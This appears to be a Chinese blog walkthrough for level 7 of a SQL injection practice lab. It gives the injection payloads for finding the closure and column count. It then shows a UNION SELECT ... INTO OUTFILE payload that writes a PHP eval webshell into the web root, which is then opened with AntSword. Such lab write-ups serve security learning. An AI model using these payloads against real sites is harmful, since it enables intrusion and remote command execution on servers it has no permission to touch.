SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

二.判断列数

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常,说明有3列

这里显示让我们用outfile来打这关,那我们先了解一下outfile:

用法:select 列名 from table [where语句] into outfile '目标文件'

三.写入木马文件

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后,就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了,我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略

相关推荐
Ant?124 分钟前
rk3588 驱动开发(三)第五章 新字符设备驱动实验
数据库·驱动开发
Always_away1 小时前
数据库系统概论|第三章:关系数据库标准语言SQL—课程笔记6
数据库·笔记·sql·学习
oioihoii1 小时前
C++23文本编码革新:迈向更现代的字符处理
java·数据库·c++23
九鼎科技-Leo1 小时前
写windows服务日志-.net4.5.2-定时修改数据库中某些参数
数据库·windows·.net
小可爱的大笨蛋1 小时前
Spring AI Alibaba - MCP连接 MySQL
人工智能·mysql·spring·mcp
柳如烟@1 小时前
Hadoop伪分布式模式搭建全攻略:从环境配置到实战测试
大数据·hadoop·分布式·mysql
hkfkn2 小时前
Sql刷题日志(day6)
数据库·sql
游王子2 小时前
Milvus(9):字符串字段、数字字段
数据库·milvus
猫咪-95272 小时前
Mysql之存储过程(下)
数据库
小白教程3 小时前
解读和分析mysql性能数据时,如何确定性能瓶颈的具体位置?
数据库·mysql·mysql教程·mysql优化教程